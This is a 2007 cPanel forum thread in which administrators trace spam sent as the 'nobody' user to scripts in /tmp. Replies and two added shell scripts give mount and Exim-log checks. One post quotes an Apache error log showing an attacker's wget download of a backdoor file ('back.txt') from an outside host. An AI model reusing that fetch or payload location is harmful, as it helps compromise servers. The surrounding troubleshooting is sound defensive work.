The Community Forums

Interact with an entire community of cPanel & WHM users!

"nobody" sending spam from my server

Discussion in 'E-mail Discussions' started by aboleth, Apr 2, 2007.

  1. aboleth

    Hello,

    I have the box checked that is supposed to stop "nobody" from sending mail. Yet, I'm getting all of these messages sent from my server.

    Return-path: <nobody@cpanel01.domain.net>
    Received: from nobody by cpanel01.domain.net with local (Exim 4.63)
    (envelope-from <nobody@cpanel01.acd.net>)
    id 1HYSM9-0002XN-Hv
    for clements@dreamscape.com; Mon, 02 Apr 2007 15:38:21 -0400
    To: clements@dreamscape.com
    Subject: WINNING NOTIFICATION (CONTACT YOUR CLAIMS AGENT)
    From: Barr.Scoth Smith <smithclaims.agent@yahoo.co.uk>
    Reply-To: smithclaims.agent@yahoo.co.uk
    MIME-Version: 1.0
    Content-Type: text/plain
    Content-Transfer-Encoding: 8bit
    Message-Id: <E1HYSM9-0002XN-Hv@cpanel01.domain.net>
    Date: Mon, 02 Apr 2007 15:38:21 -0400

    I tracked down message ID 1HYSM9-0002XN-Hv and it's coming from user ID 99, which is "nobody". Is there something else I should be doing to prevent "nobody" from sending mail?

    When I do:

    grep 99 /etc/passwd

    It returns:

    nobody:x:99:99:Nobody:/:/sbin/nologin

    I'm not sure if this is right or not. Probably a formmail exploit or something? Any help or suggestions would be greatly appreciated. I think I'm going to install mod_security, as it has had good reviews on the forums from what I have seen. Anyone know where I can find some additional info on it?


    Thanks,

    Nick
     
  2. aboleth

    BTW, it looks like these mails aren't actually going out, and the "nobody" user is not actually allowed to send. However, I'm concerned that someone is sending out a lot of mail as nobody, and I'm getting spammed with the return messages (nobody's bounces are getting forwarded to me). I'm wondering how to track this down further or find out what might be attempting to send these messages. The messages are all obvious spam.

    Thanks in advance for any help you may be able to provide.

    Nick
     
  3. arhs

  4. aboleth

    Awesome, this article has several things I haven't tried yet. I'll let you know how it goes, thanks!
     
  5. aboleth

    Looks like the spam is originating from the /tmp directory... Can't make heads or tails of it from actually going to that directory. This is much further than I was; at least I have a clue what's sending it. Anyone have any ideas as to what I should be looking for now?


    Thanks!


    Nick
     
  6. Spiral

    You should have extended logging enabled for Exim so that you can determine
    the directory where the mail-sending script originated.

    Assuming you are right about it being /tmp, then that means you need to
    edit your /etc/fstab and make your /tmp mounted as non-executable,
    or else you have a lot more to worry about than spam scripts running.
     
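A small check for the mount advice above, added here as an example and not part of the thread or of cPanel's tooling. It parses /proc/mounts-style lines ("device mountpoint fstype options dump pass") and reports whether the entry for a given mount point carries noexec; the device name and table lines are constructed. Two caveats worth keeping in mind when reading the thread: noexec stops the kernel from executing files that live on that filesystem directly, but an interpreter invoked from elsewhere (perl, php, sh reading a script file) can still run code stored under /tmp, and Exim's cwd= field records only the process's working directory, not where the script file itself lives.

```shell
#!/bin/sh
# Added example (not from the thread): verify that a mount point such as /tmp
# is mounted with the noexec option, reading /proc/mounts-style lines on stdin.
# Field layout: <device> <mountpoint> <fstype> <options> <dump> <pass>

# Constructed mount-table lines standing in for /proc/mounts before and after
# the /etc/fstab change Spiral describes (device name is made up).
MOUNTS_BEFORE='/dev/sda1 / ext3 rw 0 0
/dev/sda3 /tmp ext3 rw 0 0'
MOUNTS_AFTER='/dev/sda1 / ext3 rw 0 0
/dev/sda3 /tmp ext3 rw,noexec,nosuid,nodev 0 0'

# Print the comma-separated option list for the mount point given as $1.
# Matches on the mountpoint column only, so "/" does not match "/tmp".
mount_options() {
    awk -v mp="$1" '$2 == mp { print $4; exit }'
}

# Return 0 (true) if the option list $1 contains exactly the option $2.
# Splitting on commas avoids false matches such as "noexec" inside another word.
has_option() {
    printf '%s\n' "$1" | tr ',' '\n' | grep -qx "$2"
}

# Return 0 if mount point $1 (table on stdin) is present and mounted noexec.
mount_is_noexec() {
    opts=$(mount_options "$1")
    [ -n "$opts" ] && has_option "$opts" noexec
}

# The matching /etc/fstab entry (constructed device; keep your real one):
#   /dev/sda3  /tmp  ext3  defaults,noexec,nosuid,nodev  0 0
# followed by: mount -o remount /tmp

# Stand-alone demonstration against the constructed tables.
for table in "$MOUNTS_BEFORE" "$MOUNTS_AFTER"; do
    if printf '%s\n' "$table" | mount_is_noexec /tmp; then
        echo "/tmp: noexec set"
    else
        echo "/tmp: noexec NOT set"
    fi
done
```

On a live box the same function runs against the real table with `mount_is_noexec /tmp < /proc/mounts`; a non-zero exit means the fstab edit either was not applied or has not been remounted yet.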
  7. aboleth

    Thanks Spiral. My /tmp is mounted as non-executable. This is something I fixed with chirpy's "Configserver and Security" about 48 hours ago. Extended logging is showing the messages originating from "cwd= /tmp". Perhaps I'm not looking at the right thing? Any additional help is of course appreciated :)

    Thanks,
    Nick
     
  8. Spiral

    I'd be glad to take a look see
     
  9. aboleth

    I've enabled some extremely extended logging on exim...

    Ran the following command...

    tail -f /var/log/exim_mainlog |grep /tmp

    Got the following output.... it goes on and on...



    2007-04-03 19:13:24 cwd=/tmp 2 args: /usr/sbin/sendmail -bS
    2007-04-03 19:13:30 cwd=/tmp 2 args: /usr/sbin/sendmail -bS
    2007-04-03 19:13:41 cwd=/tmp 2 args: /usr/sbin/sendmail -bS
    2007-04-03 19:13:50 cwd=/tmp 2 args: /usr/sbin/sendmail -bS
    2007-04-03 19:13:59 cwd=/tmp 2 args: /usr/sbin/sendmail -bS
    2007-04-03 19:14:03 cwd=/tmp 2 args: /usr/sbin/sendmail -bS
    2007-04-03 19:14:03 cwd=/tmp 2 args: /usr/sbin/sendmail -bS
    2007-04-03 19:14:04 cwd=/tmp 2 args: /usr/sbin/sendmail -bS
    2007-04-03 19:14:13 cwd=/tmp 2 args: /usr/sbin/sendmail -bS
    2007-04-03 19:14:20 cwd=/tmp 2 args: /usr/sbin/sendmail -bS
    2007-04-03 19:14:21 cwd=/tmp 2 args: /usr/sbin/sendmail -bS
    2007-04-03 19:14:23 cwd=/tmp 2 args: /usr/sbin/sendmail -bS
    2007-04-03 19:14:39 cwd=/tmp 2 args: /usr/sbin/sendmail -bS
    2007-04-03 19:14:40 cwd=/tmp 2 args: /usr/sbin/sendmail -bS
    2007-04-03 19:14:43 cwd=/tmp 2 args: /usr/sbin/sendmail -bS
    2007-04-03 19:15:00 cwd=/tmp 2 args: /usr/sbin/sendmail -bS
    2007-04-03 19:15:00 cwd=/tmp 2 args: /usr/sbin/sendmail -bS
    2007-04-03 19:15:02 cwd=/tmp 2 args: /usr/sbin/sendmail -bS
    2007-04-03 19:15:18 cwd=/tmp 2 args: /usr/sbin/sendmail -bS
    2007-04-03 19:15:18 cwd=/tmp 2 args: /usr/sbin/sendmail -bS
    2007-04-03 19:15:22 cwd=/tmp 2 args: /usr/sbin/sendmail -bS
    2007-04-03 19:15:23 cwd=/tmp 2 args: /usr/sbin/sendmail -bS
    2007-04-03 19:15:23 cwd=/tmp 2 args: /usr/sbin/sendmail -bS
    2007-04-03 19:15:24 cwd=/tmp 2 args: /usr/sbin/sendmail -bS
    2007-04-03 19:15:33 cwd=/tmp 2 args: /usr/sbin/sendmail -bS
    2007-04-03 19:15:39 cwd=/tmp 2 args: /usr/sbin/sendmail -bS
    2007-04-03 19:15:40 cwd=/tmp 2 args: /usr/sbin/sendmail -bS
    2007-04-03 19:15:42 cwd=/tmp 2 args: /usr/sbin/sendmail -bS
    2007-04-03 19:15:43 cwd=/tmp 2 args: /usr/sbin/sendmail -bS


    Does that help?

    Thanks!

    Nick
     
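The log lines above come from Exim's "arguments" log selector (log_selector = +arguments), which records the working directory (cwd=) and command line of every local sendmail invocation. Grepping for /tmp alone, as in the tail command above, only shows one directory; counting every cwd value is what surfaces the account path that is actually doing the sending. The script below is an added example, not from the thread, that does that over a few constructed log lines (the /home/example path and the non-arguments "<=" line are made up to stand in for a real exim_mainlog).

```shell
#!/bin/sh
# Added example (not from the thread): summarise Exim "+arguments" log lines
# by working directory and flag invocations from world-writable scratch dirs.
# Each such line looks like:
#   2007-04-03 19:13:24 cwd=/tmp 2 args: /usr/sbin/sendmail -bS

# Constructed sample standing in for /var/log/exim_mainlog. The /home/example
# path and the "<=" delivery line are invented for the demonstration.
SAMPLE_LOG='2007-04-03 19:13:24 cwd=/tmp 2 args: /usr/sbin/sendmail -bS
2007-04-03 19:13:30 cwd=/home/example/public_html/contact 3 args: /usr/sbin/sendmail -t -i
2007-04-03 19:13:41 cwd=/tmp 2 args: /usr/sbin/sendmail -bS
2007-04-03 19:13:50 cwd=/home/example/public_html/contact 3 args: /usr/sbin/sendmail -t -i
2007-04-03 19:13:59 cwd=/home/example/public_html/contact 3 args: /usr/sbin/sendmail -t -i
2007-04-03 19:14:03 <= user@example.net H=mail.example.net [192.0.2.10] P=esmtp S=1234
2007-04-03 19:14:20 cwd=/var/tmp 2 args: /usr/sbin/sendmail -bS'

# Print "<count> <directory>" for every cwd= value seen, busiest first.
# Lines without a cwd= field (normal delivery lines) are skipped.
cwd_summary() {
    awk '{
        for (i = 1; i <= NF; i++)
            if (substr($i, 1, 4) == "cwd=") { count[substr($i, 5)]++; break }
    }
    END { for (d in count) printf "%d %s\n", count[d], d }' | sort -rn
}

# Print only the invocations whose working directory is a world-writable
# scratch directory (/tmp, /var/tmp, /dev/shm) or anything beneath one.
scratch_dir_senders() {
    awk '
    function is_scratch(d) {
        return d == "/tmp" || d == "/var/tmp" || d == "/dev/shm" ||
               index(d, "/tmp/") == 1 || index(d, "/var/tmp/") == 1 ||
               index(d, "/dev/shm/") == 1
    }
    {
        for (i = 1; i <= NF; i++)
            if (substr($i, 1, 4) == "cwd=" && is_scratch(substr($i, 5))) { print; break }
    }'
}

# Stand-alone demonstration on the constructed sample.
echo "== invocations per working directory =="
printf '%s\n' "$SAMPLE_LOG" | cwd_summary
echo "== invocations from scratch directories =="
printf '%s\n' "$SAMPLE_LOG" | scratch_dir_senders
```

Against a real log, `cwd_summary < /var/log/exim_mainlog` (or `tail -n 20000 /var/log/exim_mainlog | cwd_summary`) gives the per-directory counts; a cPanel account path near the top of that list is the place to look, and `scratch_dir_senders` isolates the /tmp and /var/tmp invocations that should not be there at all.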
  10. aboleth

    Ok, partially due to my own idiocy and not looking at the log files correctly, I totally missed the directory that was sending the mail. I found the culprit and have suspended their account. Mails stopped, server load is now much, much lower.

    I would like to thank those who helped. I really appreciate your time, and I'll be glad to help when I see questions I'm qualified to answer :)


    I have come up with the following math equation:

    (Nick + forums.cpanel.net)x(literacy + research) > spammers

    Thanks again,

    Nick
     
  11. gonz0

    I have the same problem, and usually the exploit was uploaded to the /var/tmp directory.

    But how can I find who uploaded this sh**t, and how? Is there any chance to catch it?

    In /usr/local/apache/logs/ in the error_log file I have something like this:

    % Total % Received % Xferd Average Speed Time Time Time Current
    Dload Upload Total Spent Left Speed

    100 1204 100 1204 0 0 902 0 0:00:01 0:00:01 --:--:-- 902
    100 1204 100 1204 0 0 902 0 0:00:01 0:00:01 --:--:-- 0
    --18:58:30-- http://thewayradio.com/xplrooti/back.txt
    Resolving thewayradio.com... 203.146.249.134
    Connecting to thewayradio.com|203.146.249.134|:80... connected.
    HTTP request sent, awaiting response... 200 OK
    Length: 1204 (1.2K) [text/plain]
    Saving to: `back.txt.1'

    0K . 100% 88.3M=0s

    18:58:32 (88.3 MB/s) - `back.txt.1' saved [1204/1204]

    sh: fetch: command not found


    It is sending spam via exim.
     
    #11 gonz0, May 10, 2007
    Last edited: May 10, 2007
  12. DaveUsedToWorkHere

  13. gonz0

    Removed wget, thx.

    Also added in Tweak Settings -> Prevent the user "nobody" from sending out mail to remote addresses (PHP and CGI scripts generally run as nobody if you are not using PHPSuexec and Suexec respectively).

    Now I must find how he loaded this sh*t.
     